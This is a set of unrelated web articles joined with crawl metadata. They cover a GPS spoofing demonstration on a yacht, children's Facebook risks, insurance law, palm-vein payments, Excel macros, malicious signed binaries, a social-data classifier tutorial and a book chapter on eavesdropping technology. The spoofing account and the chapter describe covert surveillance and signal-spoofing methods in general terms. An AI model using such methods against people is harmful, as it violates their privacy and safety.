Because the yacht's crew relies entirely on GPS signal for direction, the students were able to lead the yacht onto a different course without the knowledge of anyone on-board. The GPS spoofing device essentially over-powered all other GPS signals using until the spoofed signal was the only one that the yacht followed. The yacht's navigation system merely recognized it as another signal, so the yacht changed course without setting off any alarms.
The team then used the GPS spoofing device to convince the ship's crew to redirect onto a different route voluntarily. By changing the signal on the spoofing device, the students led the crew to believe that the ship was drifting off-course to the left. In response, the crew steered the ship to the right, thinking that it would get the ship back on course, when it actually brought the ship off the course entirely.
GPS spoofing is not very common, but it has already raised concerns with international regulators. As this Economist article points out, satellite spoofing is believed to be responsible for a brief daily GPS outage near the London Stock Exchange. The most likely perpetrator, according to the Economist, is a consumer spoofing device used by a delivery driver or anyone concerned that their employer is tracking their driving route.
These consumer spoofing devices, the sale of which has been banned in the U.S., can still be legally purchased in the UK, and are available for as cheap as $78 (£50).
And, of course, North Korea has already experimented with the technology, reportedly blocking GPS signal in South Korea on several occasions. One such attack launched in 2012 affected 1,016 aircraft and 254 ships. | <urn:uuid:1e542ad5-57cf-4785-aae6-878bd5c2771b> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2225056/opensource-subnet/college-students-hijack--80-million-yacht-with-gps-signal-spoofing.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173866.98/warc/CC-MAIN-20170219104613-00020-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.971695 | 402 | 2.59375 | 3 |
ZoneAlarm revealed the common behaviours of younger Facebook users that increase their susceptibility to encountering cyberbullying, predators and other security threats.
A ZoneAlarm report examined the online activities of 600 children worldwide, aged between 10-15, who regularly use Facebook. Three activities in particular showed a positive correlation with the occurrence of security threats: children adding Facebook “friends’ that may be strangers, playing Facebook games that request access to private account information, and using Facebook late at night.
Of the three activities that contribute to an increase in security threats, late night usage is highlighted as a major factor. According to the survey, children who are active on Facebook after midnight are exposed to more risks, and experience almost twice as many problems as users who log out before midnight.
These late-night users – which the study calls Facebook’s “Wild Children’ – are four times more likely to have large friend networks, consisting largely of individuals whom the users have never met in person.
Alarmingly, 60% of Facebook “Wild Children’ report having experienced serious problems including cyberbullying, account hacking, and unwanted attention from strangers.
43% of children on Facebook have experienced at least one serious problem:
- problems may include cyberbullying, hacked accounts and strangers.
- 40% of children take Facebook quizzes / play Facebook games that access personal information.
- 33% of children have Facebook friends they have never met.
Almost 25% of children surveyed are active on Facebook after midnight – Facebook’s “Wild Children”:
- Many “Wild Children’ are still online after 3am
- Children online after midnight are four times more likely to have extremely large friend networks.
- 44% of Facebook “Wild Children’ have Facebook friends they have never met in person.
- 40% of Facebook “Wild Children’ have Facebook friends who do not know any of their other friends.
Facebook “Wild Children’ experience twice as many serious problems:
- 60% report serious problems on Facebook
- 15% report they have been approached by strangers
- 20% report they have been cyberbullied
- Despite these problems, 30% say they are unconcerned about the dangers on Facebook
- And 30% have done nothing to improve their privacy.
The complete report is available here. | <urn:uuid:81182385-74eb-433a-88b2-86e47098f968> | CC-MAIN-2017-09 | https://www.helpnetsecurity.com/2012/11/12/young-facebook-users-are-most-vulnerable-to-security-threats/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00616-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.94775 | 489 | 2.875 | 3 |
It may come as no surprise that Property and Casualty insurance varies from state to state, but were you aware that these differences aren't just circumstantial? In fact, most states go as far as to enact specific laws they believe will best protect their citizens or aid insurance providers that create employment and economic revenue. Such legislative actions have significant impacts on how insurance products are ultimately sold and managed.
Are the Differences Major?
In general, Property and Casualty insurance offers protection against a range of property risks, such as fire, flooding, earthquakes and boiler leaks. One thing you might have noticed when examining contracts, however, is the fact that some risk situations are outright excluded from coverage.
For instance, if a consumer lives in a state like Massachusetts, their insurance may automatically come with a storm damage clause. Because the likelihood of storm damage is generally perceived to be rare, insurance company lobbyists may not have campaigned against the inclusion of such terms.
In states like South Carolina, on the other hand, the routine occurrence of severe weather systems may mean that consumers have to purchase separate hurricane coverage for such events. Notably, Florida has enacted laws designed to change the way insurance works and support state-run providers in light of local proclivities for natural disasters. Some private insurance firms have even quit offering coverage in these areas as a result, and the corpus of legislation impacting how products may be sold is continually expanding.
Defining Key Terms
Also remember that although they're commonly grouped together, Property insurance and Casualty insurance are different. Property insurance is designed to protect businesses or individuals who have invested in the property itself, while Casualty insurance provides them with legal liability protection in case someone else incurs a property loss or an injury.
Because state laws vary drastically when it comes to tort law and liability proceedings, it's quite possible that a state may require specific endorsements and minimum deductibles for policies to be valid. Quantified minimums are common, and they may also be accompanied by special stipulations pertaining to business consumers, such as New Jersey's Temporary Disability Benefits Law and various worker compensation laws enacted throughout the nation. Due to the unique history of insurance laws in any given state, it's usually critical to study specific codes and statutes in order to gain a better understanding of the variances. | <urn:uuid:c26576c6-64e8-4315-ae85-863b285ae190> | CC-MAIN-2017-09 | http://blog.mindhub.com/2014_08_01_archive.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172077.66/warc/CC-MAIN-20170219104612-00192-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.955141 | 463 | 2.5625 | 3 |
Students in southern Sweden have developed a biometric payment system that can be used to buy things simply by placing a palm on a screen.
The biometric reader that the system is built around emits infrared light that is absorbed by the veins in the palm. The vein pattern is subsequently analysed by the terminal to establish the user's identity, and process a payment from a previously linked bank account.
Inventor Fredrik Leifland, a software engineer at Lund University, said he decided to develop a biometric payment solution with several classmates, through a start-up called Quixter, after realising how long card transactions can take.
The technique that underpins their system already existed but until now there has been no system for using it as a form of payment.
"We had to connect all the players ourselves, which was quite complex," said Leifland. "The vein scanning terminals, the banks, the stores and the customers. The next step was finding ways of packaging it into a solution that was user-friendly."
One of the technology's main benefits is security, according to Leifland. "Every individual's vein pattern is completely unique, so there really is no way of committing fraud with this system. You always need your hand scanned for a payment to go through," he said.
In order to sign up for to use the hand payment service, a person must visit a store with a terminal, and enter their social security number and phone number. The palm scanner then takes three readings before sending a text message with an activation link from the website. Registration is completed by filling in a form with other information.
There are currently 15 stores and restaurants predominantly around the Lund University campus that use the terminals, with roughly 1,600 active users. Quixter's business model is to take a cut of transactions in the same way that credit card companies do.
Leifland said he plans to expand the idea further, adding there are businesses around the world that are interested.
This story, "Swedish Students Enable People to Buy Cups of Coffee with Their Veins" was originally published by Techworld.com. | <urn:uuid:f759e23a-4de0-4a1c-b695-f6de0af8af4c> | CC-MAIN-2017-09 | http://www.cio.com/article/2377072/enterprise-software/swedish-students-enable-people-to-buy-cups-of-coffee-with-their-veins.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174135.70/warc/CC-MAIN-20170219104614-00064-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.975563 | 436 | 2.53125 | 3 |
If you're not using macros, you're ignoring one of Excel's most powerful features. Macros save you time and spare you headaches by automating common, repetitive tasks. And you don't have to be a programmer or know Visual Basic Applications (VBA) to write one. With Excel 2013, it's as simple as recording your keystrokes.
Here we'll show you how to create macros for five commonly performed functions.
To record a macro, click Record Macro under the Developer tab. In the Record Macro dialog box, enter the following information and click OK when you're done.
Macro Name --the first character must be a letter, followed by your choice of letters, numbers, or an underscore. No other characters are accepted.
Shortcut Key --CTRL+J and CTRL+M are available. If you choose any other character, your macro will overwrite that key's original function.
Save location --Macros saved in "This Workbook" or "New Workbook" function only in those workbooks. To use in all spreadsheets, save macros to the Personal Macro Workbook (PMW).
Description --Describe the macro.
Because macros perform repetitive tasks, the object is to use them on a lot of different spreadsheets. This means you cannot hard-code the cell addresses (C1, D5, etc.), unless all of the spreadsheets are identical, which means the same number of records in the same columns and rows. To make the macro work on all spreadsheets with similar data, you must use the directional keys to navigate--then, the number of records won't matter--and always begin at the A1 position.
Organize, format, and sort imported data
Data from other programs is often available in TSV or CSV files (Tab- or Comma-Separated Values). Imagine receiving two dozen of these files every month, which have to be organized, unwanted data removed, and then sorted by company name. It takes hours to do a report like that. This macro does it in seconds.
Open the CSV worksheet. Follow the directions above to name, define and save your macro, then record the keystrokes below.
1. Press CTRL+Home to reposition your cursor in cell A1. Hold down the CTRL key and click the letters over the columns you want to eliminate (B through N plus R). Select Home>Delete>Sheet Columns.
2. Hold down the CTRL key and click columns A and D. Select Home>Format>Column Width>42>OK. Hold down the CTRL key and click columns B and C. Select tab Home>Format>Column Width>25>OK.
3. Press CTRL+Home, then CTRL+A (to select all data in the spreadsheet).
Select Home>Sort & Filter>Custom Sort. In the Sort dialog box under Column, choose Name. Under Sort On, choose Values, and under Order, choose A-Z.
4. Select Developer>Stop Recording, and it's finished. Save the worksheet as an Excel file. Open the CSV file again, select Developer>Macros, select the BranchCSV macro from the list, and click Run. The entire worksheet is organized in one second.
Split names from one column into two
How many times have you received a long list of names in one column you needed split into two columns, so the first and last name are separated? This macro does it in seconds plus sorts the list, adjusts the column widths, and gives a total list count. Open the Names worksheet, name and define your macro, then record these keystrokes.
1. Press CTRL+Home, CTRL+A. Select Data>Text to Columns. In the first Wizard dialog box, click Delimited>Next. In the second box, choose the character that delimits (separates) your text. Our list is separated by spaces, so check Space>Next. In the last box, click Text>Finish.
2. Press CTRL+Home, then CTRL+A. Select Home>Sort & Filter>Custom Sort. In the Sort dialog, select column B in the Sort By field. Click Add Level, then select column A in the Then By field. For Sort On and Order, leave the defaults Values and A-Z, then click OK.
3. Press CTRL+Home. Press Shift-Right-Arrow to highlight A1 thru B1. Click Format>Column Width>15>OK.
4. Press CTRL+Home. Select Home>Insert Sheet Rows, twice. In A1, type Total Names. Use the right arrow key to navigate to B1, then enter this formula: =COUNTA( and press CTRL+Down-Arrow, End, Shift-Down-Arrow, Enter, CTRL+Home. The total appears in B1.
5. Stop Recording, save the worksheet as Names2. Open the Names file again and run the macro.
Split column and adjust for middle names
In Excel 2013, it's easy to divide one column of names into two columns, but what if half the list contains middle names/initials and half does not? This macro extracts the middle names/initials entries, rejoins them with the first names, then produces one list with first/middle name in first column and last name in second column. Open a three-names file, name and define your macro, then record these keystrokes.
1. Press CTRL+Home, CTRL+A. Select Data>Text to Columns. In the Wizard boxes, click Delimited>Next, Space>Next, and Text >Finish. One column becomes three.
2. Press CTRL+Home, CTRL+A. Select Home>Sort & Filter>Custom Sort>column C. Press Shift-Right-Arrow. Click Format>Column Width>15>OK.
3. Press CTRL+Home, Right Arrow twice. Press End once, Down-Arrow twice, Right Arrow once--this moves the cursor to the first empty cell in column C, then to the adjacent cell in column D. Type: STOP, press Up Arrow, End, Up Arrow. Type this formula: =A1&" "&B1, then press Enter, Up Arrow.
4. Press CTRL+C, Down-Arrow. Hold down Shift, then press End, Down Arrow, Up Arrow, Enter (copies formula). Press Up Arrow once, hold down Shift, press End, Down Arrow, Up Arrow (this highlights the range without STOP).
5. Press CTRL+C, CTRL+Home, select Paste>Paste Special>Values>OK. Press Escape, CTRL+Home, Right Arrow twice. Hold down Shift, press End, Down Arrow, CTRL+C, Left Arrow, Enter to copy last names. Press Right Arrow, Shift-Right-Arrow.
6. Select Delete>Delete Sheet Columns. Press CTRL+Home. Stop Recording, save the worksheet as 3Names2; open 3Names again and run the macro.
If you're typing the same information 10 times a day, you're begging for a macro. Even if that information is brief, a macro does it in seconds and ensures accuracy. This macro adds your company info to the top of a worksheet and inserts the current date. Open a new worksheet, name and define your macro, then record these keystrokes.
1. Press CTRL+Home. Hold down Shift, then Right Arrow twice. Select Home. From the Alignment group, select Merge Across. Enter this formula in cell A1: =TODAY()Enter, Up Arrow. Select Home>Format>Format Cells>Date. Choose a date format from the list, click OK. Press Down Arrow twice.
2. Type the repetitive information and press Enter at the end of each line. Press Down Arrow. Select Developer>Stop Recording. Delete it all, unmerge cells A1 through A3, then run the macro. Save the worksheet.
Remove Blank Rows
A worksheet filled with blank rows is impossible to manage, sort, or calculate. The first step is to instruct the macro to highlight the spreadsheet data only, then select and remove the blank rows. Once that's accomplished, you can easily manage the data.
Open a file with blank rows, name and define your macro, then record these keystrokes.
1. Press CTRL+Home. Note: CTRL+A will not select all the data when blank rows are in the spreadsheet, but this macro will.
2. Select Home>Insert>Sheet Column. Press End, Down Arrow, Right Arrow, End, Up Arrow. Press CTRL+Shift-Home, Shift-Right-Arrow, CTRL+Shift-Right-Arrow. And the data range is properly selected.
3. Select Home>Find & Select>GoTo Special (or press CTRL+G, ALT+S). Click Blanks>OK and all the blanks highlight in gray. Select Delete>Delete Cells>Shift Cells Up>OK and the blanks vanish. Press CTRL+home, then select Delete>Delete Sheet Column to remove the extra column we inserted to highlight the spreadsheet without hardcoding cell addresses.
4. Stop Recording. Undo all steps, then run the macro. Save the worksheet.
This story, "5 must-know Excel macros for common tasks" was originally published by PCWorld. | <urn:uuid:5958fbde-c5bc-4dd7-9106-d0452648883a> | CC-MAIN-2017-09 | http://www.itworld.com/article/2694597/enterprise-software/5-must-know-excel-macros-for-common-tasks.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170992.17/warc/CC-MAIN-20170219104610-00184-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.794615 | 1,965 | 2.703125 | 3 |
Certificate authorities (CAs) have long been used as a trusted means to relay secure access to information via the Internet. CAs provide digital certificates that deliver the information once an application, or binary, is signed and validated by the service provider that owns the content in question. This trust model has worked until cybercriminals started obtaining certificates for malicious signed binaries, or malicious applications, which makes attacks much simpler to execute. When a user relies only on a certificate to bridge trust with a service provider, attackers can simply trick them into trusting a malicious application. When attackers are able to trick administrators and users into trusting a malicious program, they can easily evade and circumvent security software.
During the last quarter of 2013, McAfee Labs researchers discovered that malicious signed binaries have skyrocketed, reaching unprecedented numbers in more complex and advanced methods than previously recorded. During the fourth quarter of 2013, researchers found more than 2.3 million new malicious signed binaries — a 52% increase from just the third quarter. Throughout all of 2013, nearly 5.7 million new malicious signed binaries were discovered, which was more than triple the amount found in 2012.
This jump in malicious signed binaries can lead to dire consequences for application users. If these numbers remain on an increasing path, users will no longer be able to rely on certificate authorities. Users will need to rely on the vendor’s reputation who signed the binary, and the ability of the vendor to secure its data. If this is the ultimate result, the certificate authority model risks running obsolete.
Signed malware as a whole originates from stolen, purchased, or altered certificates. More specifically, though, this malware is growing at a faster rate with help from suspicious content distribution networks (CDNs). These websites allow developers to either upload programs or URLs that link to external applications, and then discreetly wrap the code in a signed installer. These CDNs offer attackers a channel for distributing their malware and disguise developers’ intentions.
Additionally, researchers were able to trace some of the malicious signed binaries back to a group of the most used CDNs. While narrowing down the list is important, it does not completely solve the problem since there are many other certificates linked to other CDNs. However, recognizing the pattern by malicious developers explains the recent and rapid growth of signed malware.
The list below shows the top certificate signers that were associated with malicious signed binaries in 2013 and their percentage of all malicious signed binaries: | <urn:uuid:18462cce-6c26-43da-b533-f9c635b31d2a> | CC-MAIN-2017-09 | https://www.mcafee.com/cf/security-awareness/articles/malicious-signed-binaries.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170992.17/warc/CC-MAIN-20170219104610-00184-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.950682 | 494 | 2.59375 | 3 |
Richard Caudle | 29th January 2014
Recently I've covered the tagging and scoring features of DataSift VEDO. My post on scoring gave a top level overview and a simple example, but might have left you hungry for something a little more meaty. In this post I’ll take you through how we’ve started to build linear classifiers internally using machine learning techniques to tackle more complex classification projects. This post will explain what a linear classifier is, how it can help you and give you a method to get you started building your own.
What Is A Linear Classifier?
Until now you’re likely to have relied on boolean expressions to categorise your social data based on looking at data by eye. A linear classifier, made possible by our new scoring features, allows you to categorise data based on machine learned characteristics over much larger data sets.
A linear classifier is a machine learned method for categorising data. Machine learning is used to identify key characteristics in a training set of data and give each characteristic a weighting to reflect its influence. When the resulting classifier is run against new data each piece of data it is given a score for how likely the data is to belong in each category. The category with the highest score is considered the most appropriate category for the new piece of data.
Linear classifiers are not the most advanced or accurate method of classification, but they are a good match for high volume data sources due to their efficiency and so are perfect for social data. The accuracy of the classifier depends greatly on the definition of the categories, quality and size of the training set and effort to iteratively improve results through tuning.
For this post I will concentrate on how we built the customer service routing classifier in our library. This classifier is designed to help airlines triage incoming customer requests.
Before I start, we use Python for our data science development work. To make use of our scripts you’ll need the following set up:
- Python development environment (version 2.7 or above)
- Scikit Learn modules (http://scikit-learn.org/stable/install.html)
To build a classifier you’ll need to carry out the following steps:
- Define the categories you want to classify data into and the data points you need to consider
- Gather raw data for the training set
- Manually classify the raw data to form the training set
- Use machine learning to identify characteristics and generate scoring rules
- Test the rule set and iterate to improve the classifier’s accuracy
Let’s look at each of these in detail.
1. Define Your Categories & Targets
The first thing you need to consider is what categories are you going to classify your data into. It is essential to invest time upfront considering the categories, and to write for each a strong definition and include a few examples. The more precise and considered you can be here, the more efficient the learning process can be and the more useful your classifier will become.
Make sure your categories are a good fit for their eventual use. You must make sure that no categories overlap and that you have categories so that all possible interactions are covered. So for example you might want to include an 'other' category as we did below.
For the airline classifier, we spent a good amount of time looking into the kind of conversations that surround airline customer services and were inspired by this Altimeter study. We wanted to demonstrate how conversations could be classified for handling by a customer services team.
The categories we finally decided on were:
- Rant: An emotionally charged criticism that may damage brand image
- “After tweeting negative comment about EasyJet, I have been refused boarding! My rights has been violated!!!”
- Rave: Thanks or positive opinion about flight or services
- “Landing during storm, saved by EasyJet pilot, thanks”
- Urgency: Request for resolving a real-time issue, including compensation
- “EasyJet Flight cancelled. I demand compensation now!”
- Query: A polite or neutral question about how to contact the company, use the website, print boarding card etc.
- “Where can I find EasyJet hand luggage dimensions?”
- Feedback: Statement about the flight or service, relating to how it could be improved, including complaints for delays without big anger.
- “Dear EasyJet, how about providing WiFi onboard”
- Lead: Contact from a customer interested in purchasing a ticket or other product/service in the near future
- “EasyJet, do you sell group tickets to Prague?”
- Others: Anything that doesn’t fit into the categories above
As you might outsource the training process (explained later) to a third party or to colleagues clear definitions are extremely important.
With your categories defined, you now need to consider what fields of your interactions should be considered. For our classifier we decided that the interaction.content target contained the relevant information.
2. Gather Data For The Training Set
To carry out machine learning you will need to feed the algorithm a set of training data which has been classified by hand. The algorithm will use this data to identify features (keywords and phrases) that influence how a piece of content is classified.
To form the training set you can extract data from the platform (by running a historic query or recording a stream) and then manually putting each interaction into a category. If you choose to use our scripts use one of our push destinations to collect data as a JSON file choosing the JSON newline delimited format.
To gather raw data for our airline classifier we used the following filter:
We ran this filter as a historic query to collect a list of 2000 interactions as an initial training set. Of course the more data you are able to manually classify, the higher quality your final classifier is likely to be.
NOTE: Remember to remove any duplicates from the dataset you extract. Datasift guarantees to deliver each interaction at least once. If there is a push failure we will try to push data again, and you may receive duplicate interactions. If you are a UNIX platform you can do so at the command line:
sort raw.json | uniq -u > deduped.json
3. Manually Classify Data To Form The Training Set
Now that you have raw set of data, the interactions need to be manually assigned categories to form the training set.
As you are likely to have thousands of data points to classify, you may want to outsource this work. This is why it is vital to have well written definitions of your categories. We chose Airtasker to outsource the work. The advantage we found of Airtasker was that we could have assigned workers that we could communicate with and give feedback to.
We reformatted the raw JSON data as a CSV file to pass to our workers. The file contained the following fields:
- interaction.id - Used to rejoin the categories back on to the original interactions
- interaction.content - The field that the worker needs to examine
- Category - to be completed by the worker
Again as with the training set size, the more effort you can spend here the better the results will be. You might want to consider asking multiple people to manually classify the data and correlate the results. Even with well written definitions two humans may disagree on right category.
With the results back from Airtasker we now had a raw set of interactions (as a JSON file) and a list of classified interactions (as a CSV file). These two combined formed our training set.
4. Generating A Classifier
With a training set in place the next step is to apply machine learning principles to generate rules for the linear classifier, and generate CSDL scoring rules to implement the classifier.
We implemented the algorithm in Python using the scikit-learn libraries, and the source is available here on GitHub.
At a high level the algorithm carries out these steps:
- For each interaction in the training set, consider the target fields (in this case interaction.content)
- Split into two sets, the first for training, the second for testing the classifier later
- For each training interactions
- Chunk the content into words and phrases
- Build a list of candidate features to be considered for rules
- Add / remove features based on domain knowledge (see below)
- From the list of features select those with the most influence
- Generate the classifier based on the selected features, and the interactions that match these features
- Test the classifier against the training interactions and output results as a confusion matrix
- Test the classifier against testing interactions put aside earlier
- For each logging the expected and actual categories assigned
- Outputting overall results as a confusion matrix
- Generate CSDL scoring rules from the classifier
The script takes in a raw JSON file of interactions (unclassified) and a CSV of classified interactions, matching the method I’ve explained. You can also specify keywords and phrases to include or exclude as an override to the automatically selected features.
See the GitHub repository for instructions on how to use the script.
The script allows you to specify keywords and phrases that must or must not be considered when generating the classifier. This allows you a level of input into the results based on human experience.
For example we specified the following words should be considered for the airline classifier as we knew they would give us strong signal:
5. Perfecting The Classifier
Your first classifier might not give you a great level of accuracy. Once you have a method working, you may need to spend considerable time iterating and improving your classifier.
You might want to extract a larger set of training data or you may wish to add or remove keywords as you learn more about the data.
The script also allows you to manipulate the parameters passed to the statistical algorithms. Refining these parameters can produce significantly different results.
I hope this post has given you some insight into building a machine learned classifier. It is impossible to give a full proof turnkey method as use cases vary so wildly.
As I said in the introduction, linear classifiers are suited to social data because of their efficiency. You may need to invest significant time perfecting your classifier, this is the nature of machine learning.
Check out our library for more examples of classifiers. We’ll be adding more linear classifiers soon!
To stay in touch with all the latest developer news please subscribe to our RSS feed at http://dev.datasift.com/blog/feed | <urn:uuid:54903a0b-a4ab-494d-b289-4b25396f6dcd> | CC-MAIN-2017-09 | http://dev.datasift.com/blog/how-apply-machine-learning-and-give-social-data-meaning | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00060-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.88732 | 2,217 | 2.734375 | 3 |
The leader in Eavesdropping Detection
and Counterespionage Consulting services
for business & government, since 1978.
THE OMINOUS EAR
by Bernard B. Spindel
Chapter 17. - Technical Aspects
The telephone instrument dates back to the early 1880’s. Wiretapping devices in existence at that time were extremely crude and basic – a condenser-equipped telephone earpiece through which one was effectively able to monitor a communication, During Prohibition the wiretapper graduated to the use of headphones for monitoring. To the present day, these two devices remain as basic and crude wiretapping instruments.
With the advent of radio and in the early 1930’s, when the vacuum-tube amplifiers became commonplace and the loud-speaker replaced the old horn-type speaker, life became much easier for the wiretapper. In the early
1930’s, the magnetic recording head became less expensive, and recording discs were added to the wiretapper’s tool and accompanied the man with the headset as a replacement for the stenographer’s notebook.
During World War II, the development of magnetic wire recording, together with the miniaturization of electronic tubes, made possible smaller, lighter and far more efficient eavesdropping devices. The high-gain amplifiers and associated components – fast becoming cheaper and easier to obtain because of mass production methods – made even more equipment available at lower prices.
In the late 1940’s, magnetic tape recorders were introduced and the transistor replaced the bulky vacuum tubes and heavy and costly power supplies. The equipment shrank from shoe-box size to the size of a package of cigarettes.
In 1955, I testified before a Congressional Committee that each of the more than fifty million telephones in the United States could, with the attachment of one wire, be converted into live microphones that conducted sound even when the phone was not in use. Such a microphone could pick up a whisper within thirty-five feet of the telephone and send the signal over telephone wires to a listening post where, at the first sound, a recorder would turn itself on and then turn itself off when the voice was no longer to be heard. This is know as a “voice-actuated stop-and-start” mechanism. Late in the 1940’s I developed the first undetectable, fully automatic telephone stop-and-start mechanism that turned the recorder on and off when the subject’s phone was lifted out of the cradle. It then recorded both sides of the conversation and automatically stopped running when the telephone was hung up. It was at this time that I built the first recorder capable of operating for fifty hours without wasted tape because it was activated only while a conversation was actually taking place.
Law enforcement and professional eavesdroppers were quick to pick up old or new technical principles and adapt them for eavesdropping purposes. I testified and demonstrated before the Committee in 1955 that a parabolic microphone – and there were numerous types and models available at that time – could, without the use of any wires or a radio transmitter, pick up the conversation of people in a rowboat out in the middle of a lake, and record it on shore.
Highly sensitive phone cartridges were developed, and these were adapted and utilized as contact microphones to pick up conversations through walls and into other rooms. Along came especially designed microphones that did this job even better. Electronics progressed and special filters became available which could eliminate background noises and limit the input to eavesdrop equipment by concentrating only on sounds of the human voice. Such efficiency is now improving to a point that background noises from cards, trucks, etc., are almost entirely eliminated.
As eavesdropping has graduated from science to art, specialized devices have been produced specifically for this field. A prime example is the non-magnetic microphone developed by the Russians. More than forty of these were installed within the walls of our Embassy in Moscow when the building was being constructed. Our State Department maintains a special staff of technicians trained and equipped to detect such devices. However, these microphones contained no metal. They were of ceramic construction and had hollow wooden tubes through which sounds originating in a particular room were transmitted through walls.
The search equipment used to detect buried wires and microphones of normal type is similar to that used in mine detectors. A tracing of a wall with one of these devices indicates every wire, nail or strip of metal buried within, but it failed to indicate the Russians’ ceramic microphones, which remained intact inside the Embassy walls for eleven years. Only the information passed along by a defector who became an informant alerted us to the fact that Embassy conversations were being leaked. In total frustration, it was decided to tear the walls apart in a desperate attempt to find the microphones.
The walls of one room were ripped out and the existence of these mikes was finally revealed.
In my testimony in 1955, I had warned the Congress that experiments indicated that it was already possible to take the conversation out of a room without benefit of wires, without benefit of radio as we knew it then, and without the need to install any device – in fact, without ever entering the particular room to be bugged.
Directly following this testimony, the Russians displayed their electronic prowess by utilizing a rather old principle based on what is known as a cavity resonator. A replica of the American eagle was presented as a gift to U.S. Ambassador Harriman. The Ambassador proudly placed it in his own office. Buried in the eagle was a transducer – a piece of metal about the size of a half-dollar, with no connecting wires. By beaming a high-frequency signal from a distance, aimed directly at the room containing the transducer, conversations taking place within the room were reflected back to the listening post. Again our State Department security agents did not detect this apparatus until they were alerted to its presence by other sources.
When I made the disclosure of this type of technology to the Congressional Committee, scientists in government and in private industry did not know what I was talking about; still others maintained the usual “will not confirm or deny” attitude and, in effect, pooh-poohed my testimony. Actually, the device to which I referred involved a principle that has never been scientifically documented, and I have never divulged the technology behind it through fear that even in official hands it might be misused against private citizens.
Sub-miniaturized devices capable of sending a signal on infra-red light beams which are invisible to the human eye, and traveling long distances without the need of radio or wires, have made novel transmissions of eavesdrops a reality. In order to detect these beams, one must either find the unit itself or be in a position to find the exact angle at which they are being emitted. They travel in the same way as do beams from a powerful searchlight. Furthermore, the use of such a device does not come under any rules or regulations or laws of the Federal Communications Commission.
A more sophisticated device is the cesium transmitter and receiver. In its pure form, cesium is a rare metal and expensive. There are standard cesium lamps which transmit light similar in characteristics to micro-radio waves. This light is limited to the line of sight as covered by the permissible distance one would encounter in the curvature of the earth to the horizon. Some interesting experiments with miniaturized cesium transmitters have permitted these light waves to go beyond the horizon by aiming them upward into the sky where, regardless of the atmosphere, they act as a mirror to a searchlight, thus transmitting the signal for many more miles than had previously been believed possible.
We have all been accustomed to remote-control garage door openers, activated by pushing a button in the car as we approach the garage, causing the doors to open and the driveway lights to go on.
We are equally accustomed to the sonic remote-control device developed by Zenith which enables one to turn a television set on and off, and to even change the channels or adjust volume and picture, without the use of connecting wires. This employs the principle of sonic transmitting signals in the inaudible range between the limits of the human ear and low-frequency radio signals. People were shocked when Life Magazine showed a martini containing an olive which housed a built-in radio transmitter, utilizing the toothpick as an antenna. While this novel device is excellent for illustrating the miniaturization possible in radio transmissions, it is of limited practicality. However, a slightly larger transmitter, the size of a pack of matches, can easily send a signal the distance of several blocks. Concealed under a chair or bed, it can indeed transmit some very interesting signals. The sonic transmitter is equally capable of picking up a whisper in a room and – without any detectable wires or radio signals – transmitting it to a sonic receiver which restores the signal to the audible sound originally picked by by the microphone. This device also eludes the jurisdiction of the FCC and does not violate Federal law.
The Federal government has not yet deemed it advisable, after more than a dozen Congressional hearings, to make it unlawful for one person to eavesdrop on another person.
One can readily understand the problems involved in locating these sophisticated devices while doing a “search.” The problems become even more complex in view of the fact that – at the will of the eavesdropper – all eavesdropping devices can now be turned on and off by remote control.
To illustrate this more fully, let us take the installation of a “bug” in the office of a subject. The eavesdropper might rent quarters nearby which would enable him to observe the comings and goings of the subject by the push of a button that could send a sonic, sub-sonic, cesium, infra-red or radio signal. This signal could be further sensitized by the possession of special tones or keying code signals; should someone attempt to do a search for the device, the eavesdropper would immediately hear the technician at work. By again pushing the control button, the eavesdropper could de-activate the unit or turn it off, leaving the searcher without a signal to follow.
In a case involving the conversion of a normal telephone into a live microphone, the eavesdropper supplies – from his remote listening post – the battery voltage necessary to make the microphone become alive. Again, should he hear someone attempting to make an inspection, he removes the battery voltage, and only a carefully trained searcher would know how to identify the telltale indications of the “hot” telephone mike.
In the more sophisticated micro-miniature microphones and amplifiers, battery voltage to activate the devices is also supplied from the listening end. Again, since the voltage can be removed should the eavesdropper sense the danger of discovery, the only indication remaining would be the device itself, and it would generally be concealed in such a way that a mere pinhole would be visible. If this kind of device were to be placed behind wood paneling that contained many nail holes, the mike-intake hole would appear no different than any of the other tiny perforations.
I demonstrated publicly the sensitivity of a microphone concealed within an ordinary duplex electrical wall outlet – the kind of outlet that might be found in any home or office in the United States. This ordinary-looking wall outlet, I explained, had only a sensitive microphone. There are other models in existence which, in addition to the microphone, have a built-in amplifier that can send a remotely controlled signal ten or more miles. Another model has a built-in miniature radio transmitter that takes its power from the power line and radiates its signal through the air. Still another model takes its power from the power line but does not radiate its signal through the air; instead, it sends back over the power lines a radio frequency that can be picked up anywhere in the same building or within the main power-line circuits feeding that building. By fancier manipulation yet, this signal can be made to go even greater distances by bypassing the power transformer on the block.
It was in 1955 that I made public a device which, once installed, would permit me to call a specific telephone number from anywhere in the United States, listen in on a telephone conversation if one were taking place and then, when the party hung up, continue to listen to conversations being held on the premises, all by long-distance remote control.
There are other sophisticated devices, unknown to the public and to law enforcement, which remain closely guarded secrets of the private investigator’s trade. Frightening as these devices are in their potential, we must face the fact that we are now entering an area of even greater technological development, one that staggers the imagination.
